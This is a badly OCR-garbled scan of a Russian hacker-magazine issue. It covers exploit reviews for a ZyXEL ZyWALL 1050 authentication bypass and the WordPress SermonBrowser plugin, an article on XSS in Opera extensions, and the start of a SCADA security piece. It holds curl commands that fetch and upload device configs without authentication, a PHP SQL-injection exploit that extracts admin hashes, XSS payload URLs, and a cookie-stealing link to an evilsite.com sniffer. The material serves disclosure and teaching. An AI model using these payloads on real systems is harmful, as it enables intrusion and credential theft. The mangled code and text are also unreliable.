ѴѴі пЗ 2 (Обход защитных механизмов РЕР & А5І_Р). 
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ЕХРЮІТЗ 
РЕѴІЕ№ — 



ЕХРЮІТ5 

РЕѴІЕѴѴ 



ЕХРЮІТЗ 

кеѵіе; 





ЕХРЮІТЗ 




РЕѴІЕѴѴ 



ЕХРЮІТЗ 

Ш1Ш_ 



ЕХРЮІТЗ 
КЕѴІЕ 



'Э Нет страницы для отображения - МісгозоН Іпіегпеі Іхріогег 



Файл правка Вид избранное Сервис Спраека 



} наз 

Адрес: 



© т ® ПоиСк Избранное ^ 



ЬИр://192. 1 68.2.20:8080рк320уСР30Мик6В| 



Пере 



Переходим на страничку, содержащую вредоносный Иа$1і-контент 



50ШТІ0Ы 



Обновить ѴѴігезбагк. 



Иаше 



МНОЖЕСТВЕННЫЕ УЯЗВИМО- 
СТИ В 2ѴХЕІ. 2Ѵ\Л/АИ ЫБО 



СѴ55Ѵ2 



9.3(АѴ:М/АС:М/Аи:І\|/С:С/І:С/А:С) 

гшз 

Серия железок 2уѴѴАИ 1150 — новое комплексное решение от 
ХуХЕБ для обеспечения информационной безопасности и управле- 
ния трафиком, включая функциональную настраиваемую защиту от 
спама, контроль полосы пропускания для разнообразных объек- 
тов сети, предотвращение вторжений и безопасность удаленных 
подключений при помощи виртуальных частных сетей. В начале 
мая немецкая группа РебТеат Репіезбпд опубликовала отчето 
двух уязвимостях в этих устройствах, найденных ими в ходе одного 
из пентестов: обход аутентификации и повышение привилегий. В 
результате эксплуатации первой уязвимости неаутентифициро- 
ванные пользователи могут скачивать и загружать конфигурацион- 
ные файлы в устройства, которые применяются автоматически. В 
результате использования второго бага пользователь с ограничен- 
ными правами может стать админом и менять через веб- интерфей с 
любые настройки. 



сотргезз . іш§ 
сІЬ/ 

бЬ/еіс/ 

бЬ/еіс/гухеІ/ 

бЬ/е1:с/2ухе1/-Р1:р/ 

бЬ/еіс/гухеІ/Тіір/соп-Р/ 

бЬ/еіс/гухеІ/Тіір/соп-Р/ІтРт-бе-РаиІІ: . соігР 

бЬ/еіс/гухеІ/Тіір/соп-р/БуБіет-бе-РаиІІ: . соігР (7354 ЬуіеБ) 

РіІесЬескБит 

■Ніеіізі: 

■Рыѵегзіоп 
кешеісііескзит 
кегпе1из§20. Ьіп 
м1:р_іта§е/ 



24 Рііѳб 

$ ипгір -1 221ВО(22С0.бЬ 
АгсЬіѵе : 221ВО(22С0.бЬ 
Мате 

бЬ_гетоѵе_І5І: 

еіс/ 




ЕХРЮІТ 



Обновления про ши во к для устройств 2уХЕІ_ ХуѴѴАИ 1150 пред- 
ставляют собойобычныЙ 2 Ір-архив, в котором также находятся 
еще два за шиф ро ванн ыхгір-архива с основной про шив кой. 
Например, архив с прошивкой 2.21 (ВОй. 2) для ХуМАИ 1150 20 
(«ХуМАИ 1156 20_2.21 (В00.2)С0.2Ір») содержит следующие 
файлы: 

221ВО(22С0.Ьіп 

221ВО(22С0.соітР (7354 ЬуіеБ) 

221ВО(22С0.бЬ 

221ВО(22С0.рб-р 

221ВО(22С0.гі 

Ріггшл/аге.хті 

Файлы 221 В 00200. Ьіп и 221 В 00200.66, несмотря на указанное 
расширение, являются зашифрованными 2 Ір-архивами (кстати, в 
анализе типа файла всем линуксоидам может помочь стандартная 
утилита /изг/Ьіп/Ше). Можно просмотреть списокфайлов в этих 
архивах: 

$ ипгір -1 221ВО(22С0.Ьіп 
АгсЬіѵе : 221ВОС22С0. Ьіп 



еіс/гухеі/ 

е1:с/2ухе1/-Р1:р/ 

е1:с/2ухе1/-Р1:р/ .бЬа/ 

е1:с/2ухе1/-Р1:р/ .бЬа/бЬа_ібр/ 

е1:с/2ухе1/-Р1:р/сег1:/ 

еіс/2ухе1/-Рір/сегі/1:ги5І:есІ/ 

е1:с/2ухе1/-Р1:р/ соп-р/ 

е1:с/2ухе1/-Р1:р/соп-р/Ы:т-бе-Раи11: . соп-р 

еіс/2ухе1/-Рір/соп-р/5у5іет-сІе-Раи11: . соп-р (7354 Ьуіев) 

РіІеІІБІ: 



31 Рііез 

Было обнаружено, что размер файла 221 ВОО2С0.соп1 : из главного 
архива вточности совпадаете размером файла зузіет-беіюии.сопі 1 
из зашифрованных архивов. Такой факт не может не намекать на 
успешное применение известной из области криптоанализа атаки 
с известным открытым текстом, что и было проделано с помощью 
следующих утилит: 

• РкСгаск от Питера Конрада; 

• ЕІеоппзоІТ Абѵапсеб Агсбіѵе Раззѵѵогб Ресоѵегу от отечественного 
производителя. 
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взлом 






ЕХРЮІТЗ 

РЕѴІЕѴѴ 



ЕХРЮІТЗ 
РЕѴІЕѴѴ 1 


1 




ЕХРЮІТЗ 

РЕѴІЕѴѴ 





ЕХРЮІТЗ 

РЕѴІЕѴѴ 



ЕХРЮІТЗ 

РЕѴІЕѴѴ 



Одно из уязвимых устройств от 2уХЕІ. 



После этого файл с исходной файловой системой устройства 
сотргезз.ітд раскрывается с помощью ипздиазЫъ. Устройства 
2уѴѴАІ_І_ 1150 управляются удаленно с помощью веб- интерфейса 
на сервере Арасбе. Чтобы войти туда, необходимо пройти аутенти- 
фикацию. Модуль «ппоб_а иіЬ_ 2 ухеІ. 50» реализует этот функционал 
и настраивается в файле /еіс/зегѵісе-СопіУЬіірсІ.сопб который 
можно извлечь из сотргезз.ітд. В этом конфиге есть директива 
«АиіЬ^ухеІЗкірРаиегп», которая отменяет аутентификацию для 
некоторыхточек: 



сопб», то настройки, указанные в нем, применятся незамедлитель- 
но. В него можно, например, добавить второго админа с известным 
нам паролем. 

Итак, две следующие команды демонстрируют, как можно скачать/ 
закачать искомый конфиг и получить полный доступ кустройству: 

$ сигі --БІІепІ: -о Біагіир-сопіі^. соітР "ІтМ:р5://192.168.Ѳ.1/ 
с§і-Ьіп/ехрог1:-с§і/іта§е5/?са1:е§огу=соп1і§&аг§0=5І:аг1:ир- 
соп1і§. согѵР" 



Аи1:Іі2ухе15кірРа1:1:егп /іта^ез/ /меЫо§іп . с§і /І18ІМ. / 

1ап§иа§е 

Админский интерфейс состоит из нескольких С6І -скриптов. Напри- 
мер, проследуя по следующей ссылке после логина под админом, 
можно получить конфигурационный файл: 

И1:1:р5://192.168.Ѳ.1/с§і-Ьіп/ехрог1:- 
с§і?са1:е§огу=соп1й§&аг§0=5І:аг1:ир-соп1й§. соітР 

Сервер Арасбе в стандартной конфигурации позволяет добавлять 
произвольные пути к СО I -скриптам. Таким образом, добавив строку 
«/іппадез/» в вышестоящую ссылку, скрипт «ехрогі-сді» все равно 
отработает и выдаст конфиг: 

ІтІіірБ ://192. 168.0.1/с§і-Ьіп/ехрог1:-с§і/іта§е5/?са1:е§огу=с 
оп^і§&аг§0=5І:аг1:ир-соп1і§. соітР 



$ сигі --зііепі: -Р ех1:-сотр-1121=50 -Р іі1е_1:уре=соп^§ -Р 
пѵ=1 -Р 'Ті1е_ра1:Іі=@5І:аг1:ир-соп^§. сопТ;1і1епате=5І:аг1:ир- 
соп1і§. соп-р" Ыііірз : //192. 168.0. 1/с§і-Ьіп/1і1е_ир1оасІ-с§і 
/іта§ез/ 



ТАР0ЕТ5 



Все прошивки 2уХЕІ_ 1156, выпущенные до 25 апреля 201 1 года, 
являются уязвимыми. 



ЗОШТІОЫ 



Скачай и установи обновленную прошивку, датированную 25 апре- 
ля, либо отключи административный веб- интерфей с. 




5СИ ИНЪЕКЦИЯ И Х55 В 
Ю КЕ55 5ЕРМОЫВРОѴѴ5ЕР 
РШ6ІЫ 



Атак как строка «/іппадез/» присутствует в директиве 
АиіЬ2ухе15кі р Раііегп , то эту ссылку можно открывать даже не за- 
логинившись в админской панели. Полученный конфиг содержит 
чувствительные данные, такие какхеши пользователей и правила 
файрвола. 

Крометого, в административном интерфейсе есть скрипт под на- 
званием «іі 1е_и ріоасі - сд і », который, как легко догадаться, позво- 
ляет загружать файлы. Применяя аналогичный фи нт со строкой «/ 
ітадез/», можно загружать конфиги без всякой аутентификации. К 
тому же, если загружаемому файлу назначить имя «зіагіир-сопбд. 



СѴ55Ѵ2 



7.5 (АѴ : ІЧ/АС : І_/Аи : І\І/С : Р/І : Р/А : Р ) 

ша 

В конце апреля некий МаЗзТгО-Ог опубликовал очередной 
эксплоит под очередной плагин для ВордПресса. Уязвимости 
достаточно тривиальные — это 501 инъекция и межсайтовый 
скриптинг. В результате эксплуатации первой можно получить 
хеш админа, в результате второй — куки пользователей (в том 
числе и админа). 



► 048 
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ЕХРЮІТЗ 

КЕѴІ Еу 1 

ЕХРЮІТЗ 



I іѵМ іпуІогн>1 енрІоіІ^ВБ 1$ рНр 17214. рЬр Иіір; //ишиі. г » *’ .ссип/ 



й ТІІіе......: I І*ЗогсіРгё55 ЗегтопВгошеег Ріидіп 0.43 Б0І_ I п ^есі: і оп ] 

И ПиіКог. . , . . : [ ПаЗзТгЙ-Ог 3 

Й Раіе. : [ 25-о4-2о11 3 

И І_осаТіоп І ЯСбЕВІЙ 3 

# НоМе г I іиЫш,5Ес4ЕѵЕг.СоП 3 

й Осжігііоасі Г Ьіѣір : //шшш . 4~14 . огд. ик/шргйрге55-р1 иді пз/^егтоп-Ьгошеег ] 
Й ЕгЗЗіг . , . , ; ( Й11 5ес4еѵег МетЬег'г 3 
Й Реаі Ѳид Гоипсіег : |_адгіре-0г 

-==[ ЕнРІОІТ 3 ==- 

й 501 1 гд ; Ніір;// 5 І Іе/шр/?зегаюп_і гі=-1+ипі оп+зеі есі+ѵег5І опС ), 2— 
й Х55 : ИИр;//5Ке/иір/?й«ііг>1оаі1йТПе_гі»пе=<5Сгір1>в1егі(0К/5Сгір^> 

# ГРО : Ніѣр://5Ііе/иір/шр-соітЬепѣ/р1ид1п5/5егтоп-Ьгоуз^г/5егтоп, рНр 

---[ Зіагі 3 — — — 

[-3 сіЬ,.и 5 г ; соѵсотЗ_ыр@І осяІЬоэІ: 

[-] с)Ь„ѵег : 5.1.54 

Е-3 сІЬ_пат : соусотЗ_иіогйргега 

[-3 сі 5 -г_гип : а^ггііп 

Е-3 рз55ысЗ : $Р$99Ні1РгЫ9Р]КѵШѵш6уи349сриі.пВ0 

-==[ РіпІ5ІіесІ ]==- 

ЕІѵМІпаІогіеІ емр 1 йіІ 505 ]і$ | 



Пример работы эксплоита под ѴѴогсІРгезз ЗеппопВгоѵѵзег 






ЕХРЮІТЗ 




РЕѴІЕѴѴ 




ЕХРЮГ 



Эксплоит написаннарЬр.приего запуске в качестве параметра 
нужно всего лишь указать ссылку на уязвимый сайт, дальше скрипт 
все сделает сам. Вот его код (исключительно для ознакомления): 

< ? рИр 
$1:=аггау( 

"сІЬ_и5г ,, => ,, и5ег( ) " , 

"сІЬ_ѵег ,, = > ,, ѵег5Іоп ( ) " , 

"сІЬ_пат ,, = > ,, сІа1:аЬа5е ( ) " , 

,, и5г_пт" = >"и5ег_1о§іп м , 

,, ра5 5ысI ,, = > ,, и5ег_ра5 5 ,, 

); 

-РипсРіоп 1:ех1:2Ііех($5І:гіп§) { 

$Ііех = ' ' ; 

$1еп = 5І:г1еп($5І:гіп§) ; 

■Рог ($і = 0; $і < $1еп; $і++) { 

$Ііех .= 5І:г_расІ(сІесІіех(огсІ($5І:гіп§[$і] ) ) , 2, 0, 5ТК_РАО_ 
І-ЕРТ); 

} 

пеііигп $Иех; 

> 

■РогеасІі($1: аз $г=>$у){ 

$х=@Рі1е_§е1:_соп1:еп1:5($аг§ѵ[1] . 

" ?зеппоп_ісІ=-1/**/ІІпІоМ/**/5еІеС1:/**/§гоир_сопса1:(0х" . 
^ех-ргбехС'^гз»" ) . 

" ,$у,0х" Лех1:2Ьех("<$г >") . 

" ) , 2+-Ргот+ыр_изегз+ыІіеге+І0=1- - " 

); 

рге§_та1:сІі_а11( ,, {<$г>( . *?)<$г>}і" ,,$х,, $ді); 




Пассивная Х55 в ѴѴогсІРгезз БеітопВгоѵѵзег 

есііо $и = ( $сІ 2 [ 1 ] [ 0 ] ) ? "[-] $г : " . $сІ 2 [ 1 ] [0] . "\п" : 
" [ - ] $п : Раііесі ! \п" ; 

} 

?> 



ТАВ6ЕТ5 



ѴѴогсІРгезБ ЭегтопВгоѵѵзег Ріидіп <= 0.43 



ЗОШТІОЫ 



Нужно обновить плагин до версии 0.44.1 или более поздней, тг 
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БЕЗОПАСНОСТЬ 
РАСШИРЕНИИ ВЕБ-БРАУЗЕРОВ. 
ОЧЕРЕДЬ ОРЕРА 

Новые векторы атак через аддоны браузеров 

* Через расширения браузеров можно провести немало знакомых 
нам атак. В этом мы убедились в прошлом номере, когда исследовали 
аддоны боодіе СНгоше. Сегодня на очереди сверхпопулярный в СНГ 
браузер Орега. Поддержка аддонов в нем появилась недавно, но от 

кации ѴѴЗС ѴѴісІдеІз зресіТісаІіоп. Эта архитектура достаточно подробно 
описана в статье Криса Милса «ѴѴЬаІ’з іп ап Орега ехіепзіоп?» ( Ьіі.іу/ 
кбѴѴкоЦ . Нам же для понимания материала хватит знания некоторых 
основных моментов о структуре аддонов. Обычно расширение в Орега 
состоит из следующих частей (некоторые из них опциональные): 

• фоновая страница (обычно іпсіех. бѣті) и сопутствующие 
скрипты - это движок расширения; 

• страница всплывающего окна, которое появляется, когда 
ты кликнешь на кнопке аддона в тулбаре веб-браузера; 

• ЗаѵаБсгірІі-скрипты и С55-стили для выполнения в соответ- 
ствии с определенными правилами в произвольных, посещаемых 
тобой веб-страницах (например, скрипт, который заменяет все 
ссылки «шаііііо:» на соответствующий обработчик твоего любимо- 
го почтового сервиса); 

• файл конфигурации сопб§.хш1 (подобно тапі-РезІ: . дзоп в 6оо§1е 
Сбготе) - в этом файле указывается мета-информация о 
расширении: название и описание, информация об авторе, 
политики безопасности и другое; 

• страница настроек аддона - для того чтобы расширение могло 
сохранять пользовательские настройки. 



этого задача только интереснее! 

Чтобы упростить жизнь разработчиков и сделать процесс создания 
расширений максимально прозрачным и удобным, создатели брау- 
зеров предлагают использовать привычные для нас веб-технологии 
для разработки браузерных аддонов. Это дает эффект: все новые 
плагины появляются как грибы после дождя. Но у такой простоты 
есть и обратная сторона медали — возможные риски в безопасности, 
которые во многом нам уже знакомы в аспекте исследования обыч- 
ных веб-приложений. Браузер Орега, разработчики которого непро- 
стительно долго отказывались от системы расширений, наконец-то 
обзавелся таким механизмом. Справедливости ради стоит отметить, 
что к этому моменту в Орега уже была технология виджетов (но мно- 
гие ли этими виджетами пользуются?) и система пользовательских 
скриптов. После найденных уязвимостей в аддонах для СЬготе мне 
было крайне интересно пощупать расширения и для Орега. Но для 
этого пришлось разобраться в структуре этих самых расширений. 

Аддон изнутри 

Расширения в Орега очень похожи на аналогичное решение в Ооодіе 
СЬготе. При их создании также используются популярные веб- 
технологии, такие как НТМЦ 058 и ^ѵаЗсгірІ:, а сами по себе они 
базируются на давно используемой при создании виджетов специфи- 
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Обход правил доступа в расширении Ооодіе 
МаіІ ЫоіНіег для посылки полученных данных 




НТТР ://ѴѴѴѴѴѴ 



1 I 

> Ііпкз 

• ѴѴЗС ѴѴісІдеІз 
зресібсабоп: 
ѵѵѵѵѵѵ.ѵѵЗ.огдЯВ/ѵѵісІдеІз . 

• Механизм междоку- 
ментных сообщений: 

доо.д[/1_ѵѵС)50 . 



Пользовательские скрипты 
в Орега 



Технология пользовательских скриптов (ІІзегЗЭ), про 
которую ты наверняка уже слышал и даже применял, 
позволяет пользователю подключать к произ- 
вольным страницам, которые он посещает, свои 
ЗаѵаЭсгірІ-скрипты. Эти скрипты будут исполнены 
веб-браузером передзагрузкой целевой страницы 
прямо в ее контексте (это очень важно). Пользо- 
вательские скрипты могут быть использованы для 
разных целей: 

• «вырезание» надоевшей рекламы на любимом 
ресурсе; 

• добавление произвольного НТМІ_-кода на 
страницу (например, виджеты социальных сетей); 

• исправление каких-либо мест (которые достав- 
ляют неудобства) на странице; 

• для чего угодно в рамках текущего документа 
и возможностей ЗаѵаБсгірі. 

Для примера приведу следующий небольшой скрипт, 
который выделит на странице все ссылки, которые 
ведут на домен, отличный оттекущего: 

// ==11зег5сгірі== 

// (Эіпсіисіе б1:1:р://ехатр1е.сот/* 

// ==/ІІзег5сгір1:== 

(іипсііоп () 

{ 

ѵаг Ііпкз = гіоситепі.§еіЕ1етеп1:5ВуТа§І\Іате( ' а ' ); 
■Роп(ѵаг і = 0; і<1іпкз . Іеп^ііі; і++) { 
іі (1іпкз[і] . бгеі. Іпс1ех0і( ' Мзізр : // ' + 
сіоситепі: .сіотаіп) != 0) { 

1іпкз[і] . ІппегТехІ = '[">] ' + 

1іпкз[і] .ІппегТехІ:; 

} 

} 

})(); 

Обрати внимание на необязательную, но весьма 
полезную шапку скрипта, в которой можно указать 
описание сценария, атакже некоторые параметры 
(к примеру, для каких доменов его необходимо под- 
ключать). 



Эти главные составляющие расширения взаимодей- 
ствуют между собой посредством специального меха- 
низма сообщений: 

Внедряемый скрипт <-> Фоновый процесс <-> 
Кнопка/Бейдж <-> Всплывающее окно 

Все эти части, за исключением элемента «Кнопка/ 
Бейдж», имеют доступ к «своему» специальному Орега 
Ехіепзіопз АРІ со следующими правилами: 

• Из фоновой страницы доступны объекты ыіпсіоы. 
місІ§еі, орега. ехіепзіоп и орега . сопіехіз - в этих 
рамках можно делать все что угодно, например, 
создавать элементы пользовательского интерфейса. 
Но при этом у тебя нет прямого доступа к содержанию 
открытой пользователем страницы. 

• Внедряемые скрипты имеют полный доступ к содер- 
жимому посещаемых пользователем страниц (чтение и 

модификация) и они могут общаться с другими 
частями расширения через упомянутый выше механизм 
сообщений . 

• Страницы всплывающих окон могут общаться с дру- 
гими частями расширения, работать с настройками 
аддона и т.д. 

Х$$ 

При первом же рассмотрении можно увидеть разницу 
между Орега и Ооодіе СЬготе в контексте взаимодей- 
ствия расширения с внешними ресурсами (картинки, 
формы и т.п.). Возьмем для примера расширение для 
оповещения о новых письмах Ооодіе МаіІ Ыоііііег. 
Удивительно, но, как и в подобном расширении для 
Ооодіе СЬготе, тут нашлась уязвимость — небезопас- 
ное использование входных данных, которое может 
привести к атакам вида Х55. В нашем случае злоу- 
мышленник посылает жертве специальным образом 
сформированное письмо со зловредной нагрузкой 
в поле темы или теле письма. Когда жертва получит 
письмо, а расширение оповестит его об этом, сработа- 
ет нагрузка. 

В силу используемых технологий исходный код рас- 
ширения, как правило, доступен. Чуть поковырявшись, 
находим в исследуемом аддоне уязвимый участок кода 
Цз/тепидз): 

// Сбеск і-Р ібеге аге Мезза§ез іо сіізріау 
Іі(еѵепі.с1аіа.т5§ && еѵепі .сіаіа .тз§. 1еп§іб > 0) 

{ 



• Орега ЕхІепзіопзАРІ: 

ѵѵѵѵѵѵ.орега.сопп/сіосз/ 

аріз/ехіепзіопз/ . 

• Все про Х38: 
доо.ді/і еу41_ . 

• Информация по по- 
литикам безопасности 
расширений: 
доо.дІ/ВІККМ . 

• ѴѴібдеІ Ассезз 
Рециезі: Роіісу : 

ѵѵѵѵѵѵ.ѵѵЗ.огд/ТВ/ 

ѵѵісідеіз-ассезз/ . 

• Документация по 
ІІзегЗЭ-скриптам в 
Орега: ѵѵѵѵѵѵ. орега . 
сот/сіосз/изефз/ . 




> ѵѵагпіпд 

Вся информация 



представлена в озна- 
комительных целях, 
чтобы показать раз- 
работчикам на слабые 
места в их продуктах. 
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Новейшая версия Орега 



// АсІсІ еѵегу тезза^е 

■Рог(ѵаг і=0; і < еѵепі:. сІа1:а.т5§.1еп§1:Іі; і++) 

{ 

ѵаг 1:оо11:ір = "<сііѵ с1азз= Чооіііір 1 ><рхи>" + 

1ап§.рорир_1:о + " " + еѵепі: .сіаѣа .тз§[і] .зепсіегтаіі + 
"</ихЬг/>" + 1ап§. рорир_-Ргот +"" + 
еѵепі:. ба1:а. тз§[ і] .аиѣііогтаіі + "<Ьг/><Ьп/></р><р>" + 
еѵепі:. сіаііа .тз§[і] . зиттагу + "</р>" 

ѵаг тз§ = $( 1 <сііѵ></сііѵ> ' ) .асІсІС1а55( 'тезза^е' ) . а1:1:г ( 
'Чі^іе", 1:оо11:ір) .1:оо11:ір({ 

Іе-Рі: : -15 

}) 

. ІтЬтІС'кз'Ьгоп^" + еѵепі:. сіаѣа. тз§[ і] . аіЩбогпате + 
"</з1:гоп§> : " + еѵепі: .сіаѣа .тз§[і] . 1:і1:1е) . с1іск( 

{ 

Ііпк: еѵепі:. сІа1:а. тз§[ і] .Ііпк 
}, І_оасІІ_іпк); 

$( ^тезза^е^ох' ) .аррепсІ(т5§) ; 



Явно видно, что при формировании списка писем соответствую- 
щие параметры письма используются безо всякой обработки 
и вставляются прямо в НТМІ_-код. Типичное место возможного 
внедрения зловредного кода в расширениях (в Орега и Ѳоодіе 
Сбготе) — это страница всплывающего окна, которая обычно 
формируется фоновым скриптом на основе входных данных, 
которыми могут быть, например, Р55-потоки или информация о 
непрочитанных электронных письмах. ИМХО, в реальном мире 
при аудите безопасности расширения этими сценариями не стоит 
ограничиваться. Вполне вероятным может быть и небезопасное 
использование так полюбившегося веб-разработчикам формата 
050 N ! Традиционно опасным считается использование в таких 
случаях функции исполнения ^ѵаЗсгірІ-кода, то есть еѵаК), 
например, вот так: 



ѵаг Ш5§ = еѵа1(" (" + гезропзе_1:ех1: + 

Вместо того чтобы использовать специальное АРІ для разбора 
^ОЫ-сообщений: 

ѵаг Ш5§ = И50ІМ. рагзе(гезропзе_1:ех1:) ; 

В таких случаях зловредная нагрузка может быть исполнена уже 
в контексте фонового скрипта, что влечет более тяжкие послед- 
ствия. 

Потенциальные цели 

Одной из самых популярных целей для Х55-атак является похи- 
щение аутентификационных данных в виде, например, сессион- 
ных кукисов. В настоящий момент разработчики Орега не пред- 
усмотрели возможность доступа к основному хранилищу кукисов 
веб-браузера (как это сделано в Ооодіе СЬготе], а у каждого 
расширения — как бы свои собственные кукисы. Но это вполне 
вероятно скоро может измениться под напором просьб разработ- 
чиков расширений. Следующие данные, доступные из расшире- 
ния, могут быть интересны злоумышленнику при проведении им 
Х55-атаки: 

• собственно кукисы самого расширения, потому как в большом 
количестве случаев с социальными расширениями, там хранится 
все тот же сессионный идентификатор; 

• настройки расширения, доступные через объект місі^еі:. 
рге-Регепсез - например, там могут быть имя пользователя и 
пароль, как в случае расширения для работы с популярным 
сервисом Кесісііі: Епѵеіоре; 

• контекстная информация - в нашем примере с Соо§1е І\Іо1:і1іег - 
это данные (адреса, темы и другое) писем жертвы; 

• банальный «фишинг» - даже в ограниченном контексте 
злоумышленник может использовать рассматриваемую уязвимость 
для фишинг-атак (см. скрин). 
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Вариант эксплуатации дырки в виде фишинг-атаки 



Как передавать данные 

Обычно, для того чтобы передать данные со стороны жертвы, злоу- 
мышленник использует так называемый снифер. К примеру, просто 
внедряет с помощью ЭаѵаБсгірІ: картинку с адресом, включающем 
данные из объекта боситепТсоокіе в качестве параметров. В случае 
с расширением в Орега такой трюк так просто не пройдет в силу 
политики безопасности, о чем недвусмысленно говорит документа- 
ция: 

Исходя из политики по умолчанию, агент пользователя 
(например, веб-браузер) должен запрещать доступ к сетевым 
ресурсам, внешним по отношению к виджету, независимо от того, 
каким образом этот доступ запрашивается - через АРІ-функции 
(например, ХМІ_Н1:1:рКедие5І:) или через разметку документа 
(например, с помощью тегов і-Ргаше, зсгірі:, іт§) . 

Наше тестируемое расширение имеет следующие правила доступа к 
внешним ресурсам, прописанные в файле конфигурации: 

<!-- Ассѳбб Роіісу --> 

кассезз огі§іп="Іі1:1:р5 ://таі1.§оо§1е.сот"/> 

кассезз огі§іп="ІгІ:1:р5 ://ыыы.§оо§1е.сот"/> 

Элемент <ассез5> дает возможность авторам расширений явным 
образом обозначить, с какими внешними ресурсами расширение 
собирается работать. Это значит, что если, например, расширению 
требуется даже просто показать картинку с внешнего ресурса, то 
необходимо это указать в этой опции! Для демонстрации в тести- 
руемом расширении пришлось использовать логотип боодіе с хоста 
уууууу.доодЬэ.сот . который подпадает под эти правила доступа. При 
этом есть два момента, которые стоит учитывать злоумышленнику в 
рамках Х55-атаки: 

• автор расширения может указать звездочку (*) в качестве 
значения «огі§іп» для того, чтобы его расширение имело 
неограниченный доступ к сетевым ресурсам; 

• атрибут «БиЬсІотаіпБ» регулирует доступ для субдоменов 
указанного домена («привет»-блоги и прочие социальные ресурсы 

с пользовательскими субдоменами). 

Но есть и другой трюк, который мы можем провернуть — можно 
сделать ссылку или другой интерактивный элемент пользователь- 
ского интерфейса с необходимым адресом. Когда жертва кликнет 
по ссылке и перейдет на сайт злоумышленника, последний получит 



требуемые данные. Например, в следующем коде показано, как 
можно заменить произвольный элемент интерфейса, чтобы запутать 
пользователя и заполучить кукисы: 

//... 

ѵаг а = сІоситеп1:.сгеа1:еЕ1етеп1:( 'а ' ); 
ѵаг сі = боситеп1:.§е1:Е1етеп1:ВуІсІ( 'орегГ ); 
а.бпе-р = "Іі1:1:р://еѵіІ5І1:е.сот/5пі-р-р.рбр?сІ=. . . 
а.ісі = "-Роо"; 

а. іппегТехІ: = 'Ореп СМаіІ ТаЬ'; 

б. рагеп1:І\ІосІе.гер1асеСІіі1сІ(а, сі); 

Взаимодействие расширений 
и безопасность 

В противовес боодіе Сбготе, Орега не позволяет расширениям 
явным образом взаимодействовать между собой. У меня было пред- 
положение, что внедряемые скрипты, будучи развитием популярной 
технологии пользовательских скриптов ІІБегбЭ, все-таки могут взаи- 
модействовать через общий документ, в который они внедряются: 

Пользовательские Заѵа5сгір1:-скрипты выполняются в 
глобальном окружении - это означает, что все объявленное 
в скрипте будет доступно в рамках веб-страницы. Учитывая это, 
рекомендуется помещать основной код скрипта в тело анонимной 
функции для того, чтобы явным образом ограничить доступность 
данных скрипта в рамках веб-страницы. 

Но судя по всему, разработчики Орега решили подкрутить безопас- 
ность. У меня не получилось добиться того, чтобы из одного 
внедренного скрипта прочитать данные (значения переменных) 
другого, загруженного перед ним в рамках общего йОМ. Ни одна 
попытка не оказалась удачной. Получается, что остается только 
одна потенциальная возможность навредить из одного расшире- 
ния другому — подпортить страницу, с которой оба аддона взаимо- 
действуют. 

Оиіто 

Расширения в Орега имеют очень похожую архитектуру, что и в 
Ооодіе Сбготе. Более того, даже уязвимости в них встречаются 
практически идентичные. 

В то же время, в силу изначально закрученных гаек в подсистеме 
безопасности, либо попросту из-за того, что что-то из критичной 
функциональности (доступ к кукисам браузера, истории и заклад- 
кам) не реализовано, злоумышленнику сложнее эксплуатировать 
найденные в расширениях Орега уязвимости. Но тут не стоит забы- 
вать, что система аддонов этого браузера еще молодая и постоянно 
изменяется, в том числе под напором просьб разработчиков. Так 
что кто знает, что и как будет устроено через некоторое время, тг 
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■ ■ Юрий Каминков (катіпкоѵгаіІсІеГепсе.ги), НТЦ «Станкоинформзащита» 



Распределение ЗСАРА с указанием степени их защищенности от несанкционированного выявления 



Канада 

ЗсЬпеіег Еіесігісз — 40% 



Финляндия 

Роскѵѵеіі Аиіотаііоп — 45% 
Агеѵа Теіерегпп ХЗ — 25% 



Китай 

ѴѴопсІегѵѵаге ІпТоисЬ — 45% 
5САС1А Ахесіа - 34% 

Другие — 21% 




США 

6Е СІМРСіТу — 45% 
ОЕХА21 ЕМ5 - 24% 
РгоЬсу 5САС1А ІЕІХ — 20% 
Агеѵа ЕМ5 5САС1А — 11% 



Южная Америка 

ѴѴопсІегѵѵаге ІпТоисЬ — 45% 
РгоЬсу 5САС1А ІЕІХ — 30% 
СІІесТЗСАСІА - 20% 
Моіогоіа ЗОАРА — 5% 



Индонезия 

СТейЗСАРА - 55% 
Зіетепз ѴѴІп СС — 45% 



ПОД ПРИЦЕЛОМ 



© Русин В. (гизіпШіМепсе.ги) 

Степень выявления 

ф Высокая 
Умеренная 
Низкая 

ф Не определена 



Анализ защищенности АСУТП 



* Червь Зіихпеі, обнаруженный на атомной станции в Бушере, наделал 
много шума. Кто стоял за всем этим? На этот вопрос не ответят еще 
несколько десятилетий. Объекты критически важных инфраструктур 
представляют большой интерес для многих, начиная с конкурирующих 
корпораций и заканчивая спецслужбами враждующих государств. 



Насколько дыра широка? 

Важные инфраструктурные объекты тщательно охраняются, поэтому 
пройти туда или пронести на территорию что-то стороннее — край- 
не затруднительно. В связи с этим наибольший интерес представ- 
ляет возможность удаленной атаки. На сегодняшний день каждое 
государство определяет для себя список наиболее важных узлов. 

И хотя этот список составляет государственную тайну, абсолютно 
очевидно его содержание: объекты электроэнергетики, ядерной и 
атомной отраслей, сектор транспортировки углеводородов, нефте- 



химия, стратегические военные сооружения. Естественно, многие 
из этих объектов подвергаются процессу автоматизации с исполь- 
зованием информационных технологий, что в комплексе представ- 
ляет собой автоматизированную систему управления технологиче- 
скими процессами (АСУ ТП). В состав типовой АСУ ТП входят три 
основных компонента: система диспетчеризации (5СА0А), теле- 
метрическая подсистема, инфраструктура коммуникации на базе 
доступных промышленных протоколов передачи данных. Зачастую 
в зарубежной литературе термин «АСУ ТП» опускают, говоря только 
о системах ЗСАйА, но важно понимать, что диспетчеризация не 
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позволяет интерактивно управлять процессом всей 
системы управления. 

Инструментальная 

подготовка 

Какой инструментарий потребуется для анализа безопас- 
ности АСУ ТП, учитывая, что дело придется иметь с 
системами диспетчеризации и управления технологиче- 
скими процессами? Здесь придется работать на стыке 
известных тебе технологий и отдельных специальных 
решений, поскольку 60% известных АСУ ТП и систем 
5СА0А развертывается на традиционных платформах 
(ѴѴіпсІоѵѵз, І_іпих). При необходимости используют плат- 
формы реального времени (жесткого, мягкого), такие как 
ОЫХ, которые гарантируют исполнение той или иной опе- 
рации с заданным интервалом времени в условиях СРВ 
(системы реального времени), хотя большее применение 
они находят в продукции военного назначения (БПЛА, 
бортовое управление). На сегодняшний день известно 
не так много узкоспециализированных программных 
средств анализа защищенности АСУТП / ЗСАйА: 

• ПК «ЗСАБА-Аудитор» (отечественный сканер для ана- 
лиза защищенности технологических сетей, АСУ ТП / 
ЗСАБА); 

